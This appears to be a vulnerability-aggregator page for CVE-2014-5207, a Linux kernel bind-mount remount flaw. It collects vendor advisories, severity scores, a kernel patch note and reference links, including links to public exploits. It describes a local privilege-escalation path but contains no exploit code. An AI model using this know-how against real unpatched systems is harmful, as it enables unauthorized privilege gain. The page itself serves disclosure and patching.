CVE-2014-5207
published 2014-08-18CVE-2014-5207: fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during…
PriorityP429medium6.2CVSS 2.0
AVLACHAuNCCICAC
EXPLOIT
EPSS
0.89%
54.8th percentile
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | linux | < linux 3.16.2-1 (bookworm) | linux 3.16.2-1 (bookworm) |
| linux | linux_kernel | <= 3.16.1 | — |
| linux | linux_kernel | >= 0 < 3.16.2-1 | 3.16.2-1 |
| linux | linux_kernel | >= 0 < 3.16.2-1 | 3.16.2-1 |
| linux | linux_kernel | >= 0 < 3.16.2-1 | 3.16.2-1 |
| linux | linux_kernel | >= 0 < 3.16.2-1 | 3.16.2-1 |
| linux | linux_kernel | >= 0 < 3.13.0-34.60 | 3.13.0-34.60 |
CVSS provenance
nvdv2.06.2MEDIUMAV:L/AC:H/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_ubuntu7.2HIGH
vendor_debian6.2MEDIUM
vendor_redhat6.2MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel (Trusty HWE) vulnerabilities
vendor_ubuntu·2014-08-18·CVSS 7.2
CVE-2014-5206 [HIGH] Linux kernel (Trusty HWE) vulnerabilities
Title: Linux kernel (Trusty HWE) vulnerabilities
Summary: Several security issues were fixed in the kernel.
Eric W. Biederman discovered a flaw with the mediation of mount flags in
the Linux kernel's user namespace subsystem. An unprivileged user could
exploit this flaw to by-pass mount restrictions, and potentially gain
administrative privileges. (CVE-2014-5207)
Kenton Varda discovered a flaw with read-only bind mounds when used with
user namespaces. An unprivileged local user could exploit this flaw to gain
full write privileges to a mount that should be read only. (CVE-2014-5206)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2014-08-18·CVSS 7.2
CVE-2014-5206 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the kernel.
Eric W. Biederman discovered a flaw with the mediation of mount flags in
the Linux kernel's user namespace subsystem. An unprivileged user could
exploit this flaw to by-pass mount restrictions, and potentially gain
administrative privileges. (CVE-2014-5207)
Kenton Varda discovered a flaw with read-only bind mounds when used with
user namespaces. An unprivileged local user could exploit this flaw to gain
full write privileges to a mount that should be read only. (CVE-2014-5206)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, whic
Red Hat
kernel: mount flags handling during remount
vendor_redhat·2014-08-01·CVSS 6.2
CVE-2014-5207 [MEDIUM] kernel: mount flags handling during remount
kernel: mount flags handling during remount
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
Statement: Not vulnerable.
This issue did not affect the versions of kernel as shipped with Red Hat Enterprise Linux 5, 6, 7, and Red Hat Enterprise Linux MRG 2.
Package: kernel (Red Hat Enterprise Linux 5) - Not affected
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Package: kern
Debian
CVE-2014-5207: linux - fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict cle...
vendor_debian·2014·CVSS 6.2
CVE-2014-5207 [MEDIUM] CVE-2014-5207: linux - fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict cle...
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
Scope: local
bookworm: resolved (fixed in 3.16.2-1)
bullseye: resolved (fixed in 3.16.2-1)
forky: resolved (fixed in 3.16.2-1)
sid: resolved (fixed in 3.16.2-1)
trixie: resolved (fixed in 3.16.2-1)
GHSA
GHSA-gv3p-vh66-pccp: fs/namespace
ghsa_unreviewed·2022-05-13
CVE-2014-5207 [MEDIUM] CWE-269 GHSA-gv3p-vh66-pccp: fs/namespace
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
Kernel
fs: Treat foreign mounts as nosuid
kernel_security·2016-06-23·CVSS 6.2
CVE-2014-5207 [MEDIUM] fs: Treat foreign mounts as nosuid
fs: Treat foreign mounts as nosuid
If a process gets access to a mount from a different user
namespace, that process should not be able to take advantage of
setuid files or selinux entrypoints from that filesystem. Prevent
this by treating mounts from other mount namespaces and those not
owned by current_user_ns() or an ancestor as nosuid.
This will make it safer to allow more complex filesystems to be
mounted in non-root user namespaces.
This does not remove the need for MNT_LOCK_NOSUID. The setuid,
setgid, and file capability bits can no longer be abused if code in
a user namespace were to clear nosuid on an untrusted filesystem,
but this patch, by itself, is insufficient to protect the system
from abuse of files that, when execed, would increase MAC privilege.
As a more concrete exp
OSV
linux vulnerabilities
osv·2014-08-18·CVSS 7.2
CVE-2014-5207 [HIGH] linux vulnerabilities
linux vulnerabilities
Eric W. Biederman discovered a flaw with the mediation of mount flags in
the Linux kernel's user namespace subsystem. An unprivileged user could
exploit this flaw to by-pass mount restrictions, and potentially gain
administrative privileges. (CVE-2014-5207)
Kenton Varda discovered a flaw with read-only bind mounds when used with
user namespaces. An unprivileged local user could exploit this flaw to gain
full write privileges to a mount that should be read only. (CVE-2014-5206)
OSV
CVE-2014-5207: fs/namespace
osv·2014-08-18·CVSS 6.2
CVE-2014-5207 [MEDIUM] CVE-2014-5207: fs/namespace
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
No detection rules found.
Bugzilla
CVE-2014-5207 CVE-2014-5206 kernel: ro bind mount bypass using user namespaces [fedora-all]
bugzilla·2014-08-13·CVSS 7.2
CVE-2014-5207 [HIGH] CVE-2014-5207 CVE-2014-5206 kernel: ro bind mount bypass using user namespaces [fedora-all]
CVE-2014-5207 CVE-2014-5206 kernel: ro bind mount bypass using user namespaces [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supporte
Bugzilla
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
bugzilla·2014-08-13·CVSS 7.2
CVE-2014-5206 [HIGH] CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
It was discovered that a privileged user in the user namespace with access to a bind mount can clear certain mount flags by calling "mount --bind -o remount,... ...".
Proposed patches:
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=a6138db815df5ee542d848318e5dae681590fccd
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=07b645589dcda8b7a5249e096fece2a67556f0f4
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=9566d6742852c527bf5af38af5cbb878dad75705
https://git.kernel.org/cgit/linux/kernel/git/ebiederm/user-namespace.git/commit/?h=for-linus&id=ffbc6f0ead47fa5a1dc9642b0331cb75c
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=9566d6742852c527bf5af38af5cbb878dad75705http://osvdb.org/show/osvdb/110055http://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.htmlhttp://seclists.org/oss-sec/2014/q3/352http://www.exploit-db.com/exploits/34923http://www.openwall.com/lists/oss-security/2014/08/13/4http://www.securityfocus.com/bid/69216http://www.ubuntu.com/usn/USN-2317-1http://www.ubuntu.com/usn/USN-2318-1https://bugzilla.redhat.com/show_bug.cgi?id=1129662https://exchange.xforce.ibmcloud.com/vulnerabilities/95266https://github.com/torvalds/linux/commit/9566d6742852c527bf5af38af5cbb878dad75705http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=9566d6742852c527bf5af38af5cbb878dad75705http://osvdb.org/show/osvdb/110055http://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.htmlhttp://seclists.org/oss-sec/2014/q3/352http://www.exploit-db.com/exploits/34923http://www.openwall.com/lists/oss-security/2014/08/13/4http://www.securityfocus.com/bid/69216http://www.ubuntu.com/usn/USN-2317-1http://www.ubuntu.com/usn/USN-2318-1https://bugzilla.redhat.com/show_bug.cgi?id=1129662https://exchange.xforce.ibmcloud.com/vulnerabilities/95266https://github.com/torvalds/linux/commit/9566d6742852c527bf5af38af5cbb878dad75705
2014-08-18
Published